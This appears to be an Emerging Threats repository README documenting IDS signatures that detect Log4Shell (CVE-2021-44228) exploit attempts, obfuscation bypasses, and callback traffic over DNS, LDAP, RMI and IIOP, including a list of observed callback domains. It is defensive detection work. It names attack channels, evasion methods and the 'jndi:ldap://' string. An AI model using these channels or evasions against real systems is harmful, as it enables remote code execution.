├── README.md └── detection_details ├── AttackStrings └── README.md ├── IIOP ├── README.md └── images │ ├── 2034730.png │ ├── 2034731.png │ └── iiop_request.png ├── Java_Class_Download ├── README.md └── images │ ├── 2014474.png │ ├── 2014475.png │ └── download.png ├── LDAP ├── README.md └── images │ ├── anon_ldap_with_payload.png │ ├── anon_ldap_with_payload_request.png │ ├── anon_ldap_with_payload_response.png │ ├── anon_ldap_with_payload_response_payload.png │ ├── anon_ldap_with_payload_response_payload2.png │ ├── ldap_javaClass.png │ ├── ldap_serialized_java.png │ ├── non-anon_ldap_request.png │ └── non-anon_ldap_response.png └── RMI ├── README.md └── images ├── 2034748.png ├── outbound_request.png └── traffic_example.png /README.md: -------------------------------------------------------------------------------- 1 | # Overview 2 | 3 | The exploitation of CVE-2021-44228 aka "[Log4Shell](https://twitter.com/GossiTheDog/status/1469252646745874435)" 4 | produces many network artifacts across the various stages required for exploitation. While some methods of exploitation 5 | can lead to Remote Code Execution (RCE) while other methods result in the disclosure of sensitive information. 6 | 7 | The "path" to RCE can be found detailed in this most excellent graphic by GovCERT.ch 8 | ![](https://www.govcert.admin.ch/blog/zero-day-exploit-targeting-popular-java-library-log4j/assets/log4j_attack.png) 9 | Image Source: https://www.govcert.admin.ch/blog/zero-day-exploit-targeting-popular-java-library-log4j/ 10 | 11 | This document details the various network based detection rules created by 12 | [Emerging Threats](https://twitter.com/ET_Labs). It will be maintained as new detection rules are updated. 13 | 14 | Please report any false positives or false negatives via [our feedback tool](https://feedback.emergingthreats.net/feedback) 15 | 16 | ## Download Directions 17 | All rules listed here are [BSD Licensed](https://rules.emergingthreatspro.com/open/suricata-5.0/LICENSE) and can be 18 | downloaded from rules.emergingthreatspro.com as per the [directions](https://rules.emergingthreatspro.com/OPEN_download_instructions.html) 19 | 20 | As updates are still being applied, to ensure receiving the most recent revision of each rule, it is suggested to pull 21 | the rules directly from the download servers. 22 | 23 | # Exploit Attempts 24 | While these signatures initially provided a good coverage on inbound attempts, attackers were quickly obfuscating the 25 | payload using an array of different methods including: 26 | - nested lookups 27 | - built-in `lower` and `upper` functions 28 | - hex/oct encoding 29 | - Unicode characters 30 | - "shorthand" notations 31 | 32 | An excellent list of Obfuscation and Bypasses can be found via 33 | [Puliczek/CVE-2021-44228-PoC-log4j-bypass-words](https://github.com/Puliczek/CVE-2021-44228-PoC-log4j-bypass-words) 34 | 35 | ## Inbound Exploit Attempts 36 | These signatures were created to detect inbound exploit attempts. Additional rules are being created to cover as many 37 | obfuscation techniques as possible, though the vast array of techniques makes this difficult. Detection via 38 | [Post Exploit Activity](#post-exploitation-activity) is a key part of a network based detection strategy. 39 | 40 | ### Inbound Signature Deployment Considerations 41 | Inbound signatures are designed to be deployed "in front of" potential vulnerable hosts. All rules have the 42 | *destination* host variable set to `[$HOME_NET,$HTTP_SERVERS]`. In order for these rules to fire correctly, the 43 | `$HOME_NET` and or `$HTTP_SERVERS` variables _must_ be correctly defined within the IDS Engine's configuration. 44 | 45 |
Click to expand list of 48 Signatures 46 | 47 | | sid | msg | 48 | |---------|-------------------------------------------------------------------------------------------------------------| 49 | | 2034647 | ET EXPLOIT Apache log4j RCE Attempt (http ldap) (CVE-2021-44228) | 50 | | 2034648 | ET EXPLOIT Apache log4j RCE Attempt (http rmi) (CVE-2021-44228) | 51 | | 2034649 | ET EXPLOIT Apache log4j RCE Attempt (tcp ldap) (CVE-2021-44228) | 52 | | 2034650 | ET EXPLOIT Apache log4j RCE Attempt (tcp rmi) (CVE-2021-44228) | 53 | | 2034651 | ET EXPLOIT Apache log4j RCE Attempt (udp ldap) (CVE-2021-44228) | 54 | | 2034652 | ET EXPLOIT Apache log4j RCE Attempt (udp rmi) (CVE-2021-44228) | 55 | | 2034653 | ET EXPLOIT Apache log4j RCE Attempt (udp dns) (CVE-2021-44228) | 56 | | 2034654 | ET EXPLOIT Apache log4j RCE Attempt (tcp dns) (CVE-2021-44228) | 57 | | 2034655 | ET EXPLOIT Apache log4j RCE Attempt (http dns) (CVE-2021-44228) | 58 | | 2034656 | ET EXPLOIT Apache log4j RCE Attempt (udp ldaps) (CVE-2021-44228) | 59 | | 2034657 | ET EXPLOIT Apache log4j RCE Attempt (tcp ldaps) (CVE-2021-44228) | 60 | | 2034658 | ET EXPLOIT Apache log4j RCE Attempt (http ldaps) (CVE-2021-44228) | 61 | | 2034659 | ET EXPLOIT Apache log4j RCE Attempt - lower/upper TCP Bypass M1 (CVE-2021-44228) | 62 | | 2034660 | ET EXPLOIT Apache log4j RCE Attempt - lower/upper UDP Bypass M1 (CVE-2021-44228) | 63 | | 2034661 | ET HUNTING Possible Apache log4j RCE Attempt - Any Protocol TCP (CVE-2021-44228) | 64 | | 2034662 | ET HUNTING Possible Apache log4j RCE Attempt - Any Protocol UDP (CVE-2021-44228) | 65 | | 2034663 | ET HUNTING Possible Apache log4j RCE Attempt - Any Protocol (upper TCP Bypass) (CVE-2021-44228) | 66 | | 2034664 | ET HUNTING Possible Apache log4j RCE Attempt - Any Protocol (upper UDP Bypass) (Outbound) (CVE-2021-44228) | 67 | | 2034665 | ET HUNTING Possible Apache log4j RCE Attempt - Any Protocol (lower TCP Bypass) (CVE-2021-44228) | 68 | | 2034666 | ET HUNTING Possible Apache log4j RCE Attempt - Any Protocol lower Bypass (udp) (CVE-2021-44228) | 69 | | 2034667 | ET EXPLOIT Apache log4j RCE Attempt (udp iiop) (CVE-2021-44228) | 70 | | 2034668 | ET EXPLOIT Apache log4j RCE Attempt (tcp iiop) (CVE-2021-44228) | 71 | | 2034671 | ET EXPLOIT Apache log4j RCE Attempt - 2021/12/13 Obfuscation Observed (tcp) (CVE-2021-44228) | 72 | | 2034672 | ET EXPLOIT Apache log4j RCE Attempt - 2021/12/13 Obfuscation Observed (udp) (CVE-2021-44228) | 73 | | 2034673 | ET EXPLOIT Possible Apache log4j RCE Attempt - 2021/12/12 Obfuscation Observed M2 (tcp) (CVE-2021-44228) | 74 | | 2034674 | ET EXPLOIT Possible Apache log4j RCE Attempt - 2021/12/12 Obfuscation Observed M2 (udp) (CVE-2021-44228) | 75 | | 2034676 | ET EXPLOIT Possible Apache log4j RCE Attempt - 2021/12/13 Obfuscation Observed (CVE-2021-44228) | 76 | | 2034699 | ET EXPLOIT Apache log4j RCE Attempt - AWS Access Key Disclosure (CVE-2021-44228) | 77 | | 2034700 | ET EXPLOIT Apache log4j RCE Attempt - lower/upper TCP Bypass M2 (CVE-2021-44228) | 78 | | 2034701 | ET EXPLOIT Apache log4j RCE Attempt - lower/upper UDP Bypass M2 (CVE-2021-44228) | 79 | | 2034702 | ET EXPLOIT Apache log4j RCE Attempt - 2021/12/12 Obfuscation Observed (tcp) (CVE-2021-44228) | 80 | | 2034703 | ET EXPLOIT Apache log4j RCE Attempt - 2021/12/12 Obfuscation Observed (udp) (CVE-2021-44228) | 81 | | 2034706 | ET EXPLOIT Apache log4j RCE Attempt - Nested lower (tcp) (CVE-2021-44228) | 82 | | 2034707 | ET EXPLOIT Apache log4j RCE Attempt - Nested lower (udp) (CVE-2021-44228) | 83 | | 2034708 | ET EXPLOIT Apache log4j RCE Attempt - Nested upper (tcp) (CVE-2021-44228) | 84 | | 2034709 | ET EXPLOIT Apache log4j RCE Attempt - Nested upper (udp) (CVE-2021-44228) | 85 | | 2034710 | ET EXPLOIT Possible Apache log4j RCE Attempt (tcp nis) (CVE-2021-44228) | 86 | | 2034711 | ET EXPLOIT Possible Apache log4j RCE Attempt (udp nis) (CVE-2021-44228) | 87 | | 2034712 | ET EXPLOIT Possible Apache log4j RCE Attempt (tcp nds) (CVE-2021-44228) | 88 | | 2034713 | ET EXPLOIT Possible Apache log4j RCE Attempt (udp nds) (CVE-2021-44228) | 89 | | 2034714 | ET EXPLOIT Possible Apache log4j RCE Attempt (tcp corba) (CVE-2021-44228) | 90 | | 2034715 | ET EXPLOIT Possible Apache log4j RCE Attempt (udp corba) (CVE-2021-44228) | 91 | | 2034716 | ET EXPLOIT Possible Apache log4j RCE Attempt - Base64 jndi (tcp) (CVE-2021-44228) | 92 | | 2034717 | ET EXPLOIT Possible Apache log4j RCE Attempt - Base64 jndi (udp) (CVE-2021-44228) | 93 | | 2034808 | ET HUNTING Possible Apache log4j RCE Attempt - Any Protocol (lower TCP Bypass) (CVE-2021-44228) | 94 | | 2034809 | ET HUNTING Possible Apache log4j RCE Attempt - Any Protocol (lower UDP Bypass) (CVE-2021-44228) | 95 | | 2034810 | ET HUNTING Possible Apache log4j RCE Attempt - Any Protocol (upper TCP Bypass) (CVE-2021-44228) | 96 | | 2034811 | ET HUNTING Possible Apache log4j RCE Attempt - Any Protocol (upper UDP Bypass) (CVE-2021-44228) | 97 | 98 |
99 | 100 | ## Outbound Exploit Attempts 101 | Due to freedom offered in some network environments and the adoption of Log4Shell exploitation by Mirai and other 102 | botnets, outbound detection has been provided in an attempt to identify systems attempting to exploit Log4Shell 103 | vulnerabilities from within the "internal" network. These rules are generally the exact same as the inbound signatures 104 | with the source host variable set to `$HOME_NET`. 105 | 106 | 107 | ### Outbound Signature Deployment Considerations 108 | Outbound signatures are designed to be deployed in a position to alert "internal" systems which are attempting to 109 | exploit vulnerable hosts either on the internet *or* the "internal" network. All rules have the *source* host variable 110 | set to `$HOME_NET` while the *destination* host variable is `any`. 111 | 112 | In order for these rules to fire correctly, the `$HOME_NET` variables _must_ be correctly defined within the IDS 113 | Engine's configuration. 114 | 115 |
Click to expand list of 43 Signatures 116 | 117 | | sid | msg | 118 | |---------|---------------------------------------------------------------------------------------------------------------------| 119 | | 2034750 | ET EXPLOIT Possible Apache log4j RCE Attempt - Base64 jndi (udp) (Outbound) (CVE-2021-44228) | 120 | | 2034751 | ET EXPLOIT Possible Apache log4j RCE Attempt - Base64 jndi (tcp) (Outbound) (CVE-2021-44228) | 121 | | 2034758 | ET EXPLOIT Apache log4j RCE Attempt (http rmi) (Outbound) (CVE-2021-44228) | 122 | | 2034759 | ET EXPLOIT Apache log4j RCE Attempt (tcp ldap) (Outbound) (CVE-2021-44228) | 123 | | 2034760 | ET EXPLOIT Apache log4j RCE Attempt (tcp rmi) (Outbound) (CVE-2021-44228) | 124 | | 2034761 | ET EXPLOIT Apache log4j RCE Attempt (udp ldap) (Outbound) (CVE-2021-44228) | 125 | | 2034762 | ET EXPLOIT Apache log4j RCE Attempt (udp rmi) (Outbound) (CVE-2021-44228) | 126 | | 2034763 | ET EXPLOIT Apache log4j RCE Attempt (udp dns) (Outbound) (CVE-2021-44228) | 127 | | 2034764 | ET EXPLOIT Apache log4j RCE Attempt (tcp dns) (Outbound) (CVE-2021-44228) | 128 | | 2034765 | ET EXPLOIT Apache log4j RCE Attempt (http dns) (Outbound) (CVE-2021-44228) | 129 | | 2034766 | ET EXPLOIT Apache log4j RCE Attempt (udp ldaps) (Outbound) (CVE-2021-44228) | 130 | | 2034767 | ET EXPLOIT Apache log4j RCE Attempt (tcp ldaps) (Outbound) (CVE-2021-44228) | 131 | | 2034768 | ET EXPLOIT Apache log4j RCE Attempt (http ldaps) (Outbound) (CVE-2021-44228) | 132 | | 2034781 | ET EXPLOIT Apache log4j RCE Attempt - lower/upper TCP Bypass M1 (Outbound) (CVE-2021-44228) | 133 | | 2034782 | ET EXPLOIT Apache log4j RCE Attempt - lower/upper UDP Bypass M1 (Outbound) (CVE-2021-44228) | 134 | | 2034783 | ET HUNTING Possible Apache log4j RCE Attempt - Any Protocol TCP (Outbound) (CVE-2021-44228) | 135 | | 2034784 | ET HUNTING Possible Apache log4j RCE Attempt - Any Protocol UDP (Outbound) (CVE-2021-44228) | 136 | | 2034785 | ET HUNTING Possible Apache log4j RCE Attempt - Any Protocol (upper TCP Bypass) (Outbound) (CVE-2021-44228) | 137 | | 2034786 | ET EXPLOIT Possible Apache log4j RCE Attempt - 2021/12/12 Obfuscation Observed M2 (tcp) (Outbound) (CVE-2021-44228) | 138 | | 2034787 | ET EXPLOIT Apache log4j RCE Attempt (tcp iiop) (Outbound) (CVE-2021-44228) | 139 | | 2034788 | ET EXPLOIT Apache log4j RCE Attempt (udp iiop) (Outbound) (CVE-2021-44228) | 140 | | 2034789 | ET EXPLOIT Possible Apache log4j RCE Attempt (udp corba) (Outbound) (CVE-2021-44228) | 141 | | 2034790 | ET EXPLOIT Possible Apache log4j RCE Attempt (tcp corba) (Outbound) (CVE-2021-44228) | 142 | | 2034791 | ET EXPLOIT Possible Apache log4j RCE Attempt (udp nds) (Outbound) (CVE-2021-44228) | 143 | | 2034792 | ET EXPLOIT Possible Apache log4j RCE Attempt (tcp nds) (Outbound) (CVE-2021-44228) | 144 | | 2034793 | ET EXPLOIT Possible Apache log4j RCE Attempt (udp nis) (Outbound) (CVE-2021-44228) | 145 | | 2034794 | ET EXPLOIT Possible Apache log4j RCE Attempt (tcp nis) (Outbound) (CVE-2021-44228) | 146 | | 2034795 | ET EXPLOIT Apache log4j RCE Attempt - Nested upper (udp) (Outbound) (CVE-2021-44228) | 147 | | 2034796 | ET EXPLOIT Apache log4j RCE Attempt - Nested upper (tcp) (Outbound) (CVE-2021-44228) | 148 | | 2034797 | ET EXPLOIT Apache log4j RCE Attempt - Nested lower (udp) (Outbound) (CVE-2021-44228) | 149 | | 2034798 | ET EXPLOIT Apache log4j RCE Attempt - Nested lower (tcp) (Outbound) (CVE-2021-44228) | 150 | | 2034799 | ET EXPLOIT Apache log4j RCE Attempt - lower/upper UDP Bypass M2 (Outbound) (CVE-2021-44228) | 151 | | 2034800 | ET EXPLOIT Apache log4j RCE Attempt - lower/upper TCP Bypass M2 (Outbound) (CVE-2021-44228) | 152 | | 2034801 | ET HUNTING Possible Apache log4j RCE Attempt - Any Protocol (upper UDP Bypass) (Outbound) (CVE-2021-44228) | 153 | | 2034802 | ET HUNTING Possible Apache log4j RCE Attempt - Any Protocol (lower TCP Bypass) (Outbound) (CVE-2021-44228) | 154 | | 2034803 | ET HUNTING Possible Apache log4j RCE Attempt - Any Protocol (lower UDP Bypass) (Outbound) (CVE-2021-44228) | 155 | | 2034804 | ET EXPLOIT Apache log4j RCE Attempt - 2021/12/13 Obfuscation Observed (udp) (Outbound) (CVE-2021-44228) | 156 | | 2034805 | ET EXPLOIT Possible Apache log4j RCE Attempt - 2021/12/12 Obfuscation Observed M2 (udp) (Outbound) (CVE-2021-44228) | 157 | | 2034806 | ET EXPLOIT Possible Apache log4j RCE Attempt - 2021/12/13 Obfuscation Observed (Outbound) (CVE-2021-44228) | 158 | | 2034807 | ET EXPLOIT Apache log4j RCE Attempt - AWS Access Key Disclosure (Outbound) (CVE-2021-44228) | 159 | | 2034834 | ET EXPLOIT Apache log4j RCE Attempt - 2021/12/12 Obfuscation Observed (udp) (Outbound) (CVE-2021-44228) | 160 | | 2034835 | ET EXPLOIT Apache log4j RCE Attempt - 2021/12/12 Obfuscation Observed (tcp) (Outbound) (CVE-2021-44228) | 161 | | 2034836 | ET EXPLOIT Apache log4j RCE Attempt - 2021/12/13 Obfuscation Observed (tcp) (Outbound) (CVE-2021-44228) | 162 | 163 |
164 | 165 | # Post Exploitation Activity 166 | While there are many methods of obfuscating the inbound/outbound attack strings, the resulting response traffic can 167 | be gathered into a few different categories. 168 | 169 | ## DNS 170 | One of the more popular attack strings does not deliver any Remote Code Execution(RCE) payload, but instead results in 171 | exfiltration of sensitive system details via DNS Queries. 172 | 173 | It is not possible to provide high degree of efficacy of log4j exploitation resulting in DNS exfiltration due to the 174 | dynamic nature of exfiltrated details, large number of "receiving" dns servers. 175 | 176 | DNS Exfiltration is detailed via screenshots in 177 | [Zander Work's Twitter Thread](https://twitter.com/captainGeech42/status/1470055184449613829) 178 | 179 | ### Commonly Observed Callback Domains 180 | There are some commonly used services being observed that are utilized in order to "catch" the exfiltrated data. 181 | 182 | Emerging Threats has created the following detections for commonly used Payload and C2 domains. 183 | 184 | | sid | msg | 185 | |---------|---------------------------------------------------------------------------------------------------------------------| 186 | | 2034198 | ET INFO Interactsh Domain in DNS Lookup (.interact .sh) | 187 | | 2034200 | ET MALWARE Interactsh CnC Activity | 188 | | 2034201 | ET MALWARE Interactsh Control Panel (DNS) | 189 | | 2034732 | ET INFO Interactsh Domain in DNS Lookup (.interactsh .com) | 190 | | 2034669 | ET POLICY dnslog .cn Observed in DNS Query | 191 | | 2034670 | ET ATTACK_RESPONSE DNS Query for Observed CVE-2021-44228 Callback Domain (bindsearchlib .com | 192 | | 2034747 | ET ATTACK_RESPONSE DNS Query for Observed CVE-2021-44228 Callback Domain (rce .ee) | 193 | | 2034819 | ET ATTACK_RESPONSE DNS Query for Observed CVE-2021-44228 Security Scanner Domain (log4j .binaryedge .io) | 194 | | 2034820 | ET ATTACK_RESPONSE DNS Query for Observed CVE-2021-44228 Security Scanner Domain (log4shell .huntress .com) | 195 | | 2034821 | ET ATTACK_RESPONSE DNS Query for Observed CVE-2021-44228 Security Scanner Domain (kryptoslogic-cve-2021-44228 .com) | 196 | | 2034832 | ET ATTACK_RESPONSE DNS Query for Observed CVE-2021-44228 Security Scanner Domain (.l4j .canarytokens .com) | 197 | | 2034822 | ET ATTACK_RESPONSE DNS Query for Observed CVE-2021-44228 Callback Domain (ceye .io) | 198 | | 2034823 | ET ATTACK_RESPONSE DNS Query for Observed CVE-2021-44228 Callback Domain (oob .li) | 199 | | 2034824 | ET ATTACK_RESPONSE DNS Query for Observed CVE-2021-44228 Callback Domain (pwn .af) | 200 | | 2034825 | ET ATTACK_RESPONSE DNS Query for Observed CVE-2021-44228 Callback Domain (notburpcollaborator .net) | 201 | | 2034826 | ET ATTACK_RESPONSE DNS Query for Observed CVE-2021-44228 Callback Domain (scannermcscanface-edgescan .com) | 202 | | 2034827 | ET ATTACK_RESPONSE DNS Query for Observed CVE-2021-44228 Callback Domain (service .exfil .site) | 203 | | 2034828 | ET ATTACK_RESPONSE DNS Query for Observed CVE-2021-44228 Callback Domain (scanworld .net) | 204 | | 2034829 | ET ATTACK_RESPONSE DNS Query for Observed CVE-2021-44228 Callback Domain (dns .cyberwar .nl) | 205 | | 2034830 | ET ATTACK_RESPONSE DNS Query for Observed CVE-2021-44228 Callback Domain (log .exposedbotnets .ru) | 206 | | 2034831 | ET ATTACK_RESPONSE DNS Query for Observed CVE-2021-44228 Callback Domain (leakix .net) | 207 | 208 | ## LDAP 209 | 210 | Detailed LDAP detection including screenshots of alerting traffic can be found in the 211 | [LDAP Detection Details](detection_details/LDAP/README.md). These rules are designed to alert on the connection to and 212 | response from "malicious ldap" servers. 213 | 214 | | sid | msg | Notes | 215 | |---------|-----------------------------------------------------------------------------|----------------------| 216 | | 2034704 | ET POLICY Anonymous LDAPv3 Bind Request Outbound | sets flowbit | 217 | | 2034705 | ET POLICY Successful Anonymous LDAPv3 Bind Request Outbound | depends on `2034704` | 218 | | 2034722 | ET ATTACK_RESPONSE Possible CVE-2021-44228 Payload via LDAPv3 Response | | 219 | | 2034769 | ET ATTACK_RESPONSE Possible CVE-2021-44228 Payload via LDAPv3 Response M2 | | 220 | | 2034770 | ET POLICY JavaClass Returned Via Anonymous Outbound LDAPv3 Bind Request | depends on `2034704` | 221 | | 2034812 | ET POLICY Non-Anonymous LDAPv3 Bind Request Outbound | sets flowbit | 222 | | 2034771 | ET POLICY Successful Non-Anonymous LDAPv3 Bind Request Outbound | depends on `2034812` | 223 | | 2034772 | ET POLICY JavaClass Returned Via Non-Anonymous Outbound LDAPv3 Bind Request | depends on `2034812` | 224 | | 2034818 | ET POLICY Serialized Java Object returned via LDAPv3 Response | | 225 | 226 | ## LDAPS 227 | 228 | Due to the nature of LDAPS, payload detection is not feasible. However, signatures have been created for the use of 229 | LDAPS with external networks. 230 | 231 | | sid | msg | Notes | 232 | |---------|---------------------------------------------------------------|----------------------| 233 | | 2034719 | ET POLICY LDAPSv3 LDAPS_START_TLS Request Outbound | sets flowbit | 234 | | 2034720 | ET POLICY Successful LDAPSv3 LDAPS_START_TLS Request Outbound | depends on `2034720` | 235 | | 2034721 | ET POLICY Successful LDAPSv3 LDAPS_START_TLS Request Outbound | depends on `2034720` | 236 | 237 | ## Java Class Download 238 | These signatures, which have existed for several years, alert on Java downloading additional Class files or Serialized 239 | data from a webserver. This method was observed during the initial use of the `jdni:ldap://` attack string which would 240 | result in the fetching of a Java payload via HTTP/HTTPS. 241 | 242 | Details of this detection method can be found in the [Java Payloads Detection Details](detection_details/Java_Class_Download/README.md) 243 | 244 | | sid | msg | Notes | 245 | |---------|---------------------------------------------------------|--------------------------------------| 246 | | 2013035 | ET POLICY Java Client HTTP Request | sets flowbit for `Java/` User Agent | 247 | | 2014474 | ET INFO JAVA - Java Class Download | depends on `2013035` | 248 | | 2014475 | ET INFO JAVA - Java Class Download By Vulnerable Client | See list below for flowbit set rules | 249 | | 2016502 | ET INFO Java Serialized Data via vulnerable client | See list below for flowbit set rules | 250 | | 2016503 | ET INFO Java Serialized Data | depends on `2013035` | 251 | 252 | 253 | ### Signatures which determine "Vulnerable Client" 254 | This class of signatures is designed to detect when not using the latest version of a Java "branch" 255 | 256 | | sid | msg | 257 | |---------|---------------------------------------------------| 258 | | 2011581 | ET POLICY Vulnerable Java Version 1.5.x Detected | 259 | | 2011582 | ET POLICY Vulnerable Java Version 1.6.x Detected | 260 | | 2011584 | ET POLICY Vulnerable Java Version 1.4.x Detected | 261 | | 2014297 | ET POLICY Vulnerable Java Version 1.7.x Detected | 262 | | 2019401 | ET POLICY Vulnerable Java Version 1.8.x Detected | 263 | | 2025314 | ET POLICY Vulnerable Java Version 9.0.x Detected | 264 | | 2025518 | ET POLICY Vulnerable Java Version 10.0.x Detected | 265 | | 2028867 | ET POLICY Vulnerable Java Version 11.0.x Detected | 266 | | 2028868 | ET POLICY Vulnerable Java Version 12.0.x Detected | 267 | | 2028869 | ET POLICY Vulnerable Java Version 13.0.x Detected | 268 | | 2034814 | ET POLICY Vulnerable Java Version 14.0.x Detected | 269 | | 2034815 | ET POLICY Vulnerable Java Version 15.0.x Detected | 270 | | 2034816 | ET POLICY Vulnerable Java Version 16.0.x Detected | 271 | | 2034817 | ET POLICY Vulnerable Java Version 17.0.x Detected | 272 | 273 | 274 | ## RMI 275 | Detailed RMI detection including screenshots of alerting traffic can be found in the 276 | [RMI Detection Details](detection_details/RMI/README.md). 277 | 278 | | sid | msg | Notes | 279 | |---------|------------------------------------------------------|----------------------| 280 | | 2034718 | ET POLICY RMI Request Outbound | sets flowbit | 281 | | 2034748 | ET POLICY Serialized Java Payload via RMI Response | depends on `2034718` | 282 | | 2034749 | ET POLICY Unserialized Java Payload via RMI Response | depends on `2034718` | 283 | 284 | ## IIOP 285 | Detailed IIOP detection including screenshots of alerting traffic can be found in the 286 | [IIOP Detection Details](detection_details/IIOP/README.md). 287 | | sid | msg | Notes | 288 | |---------|-------------------------------------------------|----------------------| 289 | | 2034730 | ET POLICY GIOP/IIOP Request Outbound | sets flowbit | 290 | | 2034731 | ET POLICY Successful GIOP/IIOP Request Outbound | depends on `2034730` | 291 | 292 | 293 | # Special Thanks 294 | Emerging Threats would like to thank the following contributors for their efforts: 295 | 296 | For the initial environments for testing 297 | - [Try Hack Me](https://twitter.com/RealTryHackMe) 298 | - [John Hammond](https://twitter.com/_JohnHammond) 299 | 300 | For providing pcaps for signature creation 301 | - [SLASH30Miata](https://twitter.com/SLASH30Miata) 302 | - Juniper Threat Labs 303 | - [GreyNoise](https://twitter.com/GreyNoiseIO) 304 | - [Cloudshark](https://www.cloudshark.org/captures/fe73350d9a3d) 305 | 306 | For tools and directions used in testing environments 307 | - [vulhub](https://github.com/vulhub/vulhub/blob/ab2cbc517fcabaaf0c8f07a03b7947b795c8dc9a/log4j/CVE-2021-44228/README.md) 308 | - [Veracode](https://github.com/veracode-research/rogue-jndi/) 309 | - [lhotari](https://github.com/lhotari/log4shell-mitigation-tester#exploiting-with-rogue-jndi) 310 | - [0xJDow](https://github.com/0xJDow/rogue-rmi-server) 311 | - [christophetd](https://github.com/christophetd/log4shell-vulnerable-app) 312 | 313 | For having awesome details which were referenced 314 | - [Puliczek](https://github.com/Puliczek/CVE-2021-44228-PoC-log4j-bypass-words) 315 | - [captainGeech42](https://twitter.com/captainGeech42/) 316 | - [GovCERT.ch](https://www.govcert.admin.ch/blog/zero-day-exploit-targeting-popular-java-library-log4j/#) -------------------------------------------------------------------------------- /detection_details/AttackStrings/README.md: -------------------------------------------------------------------------------- 1 | # Attack String Detection 2 | 3 | 4 | ## Protocol detection strings 5 | 6 | These signatures are designed to detect the attack strings for the various JNDI supported network services: 7 | 8 | | Inbound SID | Outbound SID | msg | 9 | |-------------|--------------|---------------------------------------------------------------------------| 10 | | 2034647 | | ET EXPLOIT Apache log4j RCE Attempt (http ldap) (CVE-2021-44228) | 11 | | 2034649 | 2034759 | ET EXPLOIT Apache log4j RCE Attempt (tcp ldap) (CVE-2021-44228) | 12 | | 2034651 | 2034761 | ET EXPLOIT Apache log4j RCE Attempt (udp ldap) (CVE-2021-44228) | 13 | | 2034656 | 2034766 | ET EXPLOIT Apache log4j RCE Attempt (udp ldaps) (CVE-2021-44228) | 14 | | 2034657 | 2034767 | ET EXPLOIT Apache log4j RCE Attempt (tcp ldaps) (CVE-2021-44228) | 15 | | 2034658 | 2034768 | ET EXPLOIT Apache log4j RCE Attempt (http ldaps) (CVE-2021-44228) | 16 | | 2034648 | 2034758 | ET EXPLOIT Apache log4j RCE Attempt (http rmi) (CVE-2021-44228) | 17 | | 2034650 | 2034760 | ET EXPLOIT Apache log4j RCE Attempt (tcp rmi) (CVE-2021-44228) | 18 | | 2034652 | 2034762 | ET EXPLOIT Apache log4j RCE Attempt (udp rmi) (CVE-2021-44228) | 19 | | 2034653 | 2034763 | ET EXPLOIT Apache log4j RCE Attempt (udp dns) (CVE-2021-44228) | 20 | | 2034654 | 2034764 | ET EXPLOIT Apache log4j RCE Attempt (tcp dns) (CVE-2021-44228) | 21 | | 2034655 | 2034765 | ET EXPLOIT Apache log4j RCE Attempt (http dns) (CVE-2021-44228) | 22 | | 2034667 | 2034788 | ET EXPLOIT Apache log4j RCE Attempt (udp iiop) (CVE-2021-44228) | 23 | | 2034668 | 2034787 | ET EXPLOIT Apache log4j RCE Attempt (tcp iiop) (CVE-2021-44228) | 24 | | 2034714 | 2034790 | ET EXPLOIT Possible Apache log4j RCE Attempt (tcp corba) (CVE-2021-44228) | 25 | | 2034715 | 2034789 | ET EXPLOIT Possible Apache log4j RCE Attempt (udp corba) (CVE-2021-44228) | 26 | | 2034712 | 2034792 | ET EXPLOIT Possible Apache log4j RCE Attempt (tcp nds) (CVE-2021-44228) | 27 | | 2034713 | 2034791 | ET EXPLOIT Possible Apache log4j RCE Attempt (udp nds) (CVE-2021-44228) | 28 | | 2034710 | 2034794 | ET EXPLOIT Possible Apache log4j RCE Attempt (tcp nis) (CVE-2021-44228) | 29 | | 2034711 | 2034793 | ET EXPLOIT Possible Apache log4j RCE Attempt (udp nis) (CVE-2021-44228) | 30 | 31 | 32 | ## Bypass and Obfuscation Detection 33 | 34 | | Inbound SID | Outbound SID | msg | Notes | 35 | |-------------|--------------|----------------------------------------------------------------------------------------------------------|----------| 36 | | 2034659 | 2034781 | ET EXPLOIT Apache log4j RCE Attempt - lower/upper TCP Bypass M1 (CVE-2021-44228) | | 37 | | 2034660 | 2034782 | ET EXPLOIT Apache log4j RCE Attempt - lower/upper UDP Bypass M1 (CVE-2021-44228) | | 38 | | 2034700 | 2034800 | ET EXPLOIT Apache log4j RCE Attempt - lower/upper TCP Bypass M2 (CVE-2021-44228) | | 39 | | 2034701 | 2034799 | ET EXPLOIT Apache log4j RCE Attempt - lower/upper UDP Bypass M2 (CVE-2021-44228) | | 40 | | 2034702 | 2034835 | ET EXPLOIT Apache log4j RCE Attempt - 2021/12/12 Obfuscation Observed (tcp) (CVE-2021-44228) | Disabled | 41 | | 2034703 | 2034834 | ET EXPLOIT Apache log4j RCE Attempt - 2021/12/12 Obfuscation Observed (udp) (CVE-2021-44228) | Disabled | 42 | | 2034716 | 2034751 | ET EXPLOIT Possible Apache log4j RCE Attempt - Base64 jndi (tcp) (CVE-2021-44228) | | 43 | | 2034717 | 2034750 | ET EXPLOIT Possible Apache log4j RCE Attempt - Base64 jndi (udp) (CVE-2021-44228) | | 44 | | 2034673 | 2034786 | ET EXPLOIT Possible Apache log4j RCE Attempt - 2021/12/12 Obfuscation Observed M2 (tcp) (CVE-2021-44228) | | 45 | | 2034674 | 2034805 | ET EXPLOIT Possible Apache log4j RCE Attempt - 2021/12/12 Obfuscation Observed M2 (udp) (CVE-2021-44228) | | 46 | | 2034671 | 2034836 | ET EXPLOIT Apache log4j RCE Attempt - 2021/12/13 Obfuscation Observed (tcp) (CVE-2021-44228) | Disabled | 47 | | 2034672 | 2034804 | ET EXPLOIT Apache log4j RCE Attempt - 2021/12/13 Obfuscation Observed (udp) (CVE-2021-44228) | Disabled | 48 | | 2034676 | 2034806 | ET EXPLOIT Possible Apache log4j RCE Attempt - 2021/12/13 Obfuscation Observed (CVE-2021-44228) | | 49 | 50 | 51 | ## AWS Key Disclosure 52 | 53 | | Inbound SID | Outbound SID | msg | 54 | |-------------|--------------|----------------------------------------------------------------------------------| 55 | | 2034699 | 2034807 | ET EXPLOIT Apache log4j RCE Attempt - AWS Access Key Disclosure (CVE-2021-44228) | 56 | 57 | 58 | ### Nested lower/upper 59 | 60 | | Inbound SID | Outbound SID | msg | 61 | |-------------|--------------|---------------------------------------------------------------------------| 62 | | 2034706 | 2034798 | ET EXPLOIT Apache log4j RCE Attempt - Nested lower (tcp) (CVE-2021-44228) | 63 | | 2034707 | 2034797 | ET EXPLOIT Apache log4j RCE Attempt - Nested lower (udp) (CVE-2021-44228) | 64 | | 2034708 | 2034796 | ET EXPLOIT Apache log4j 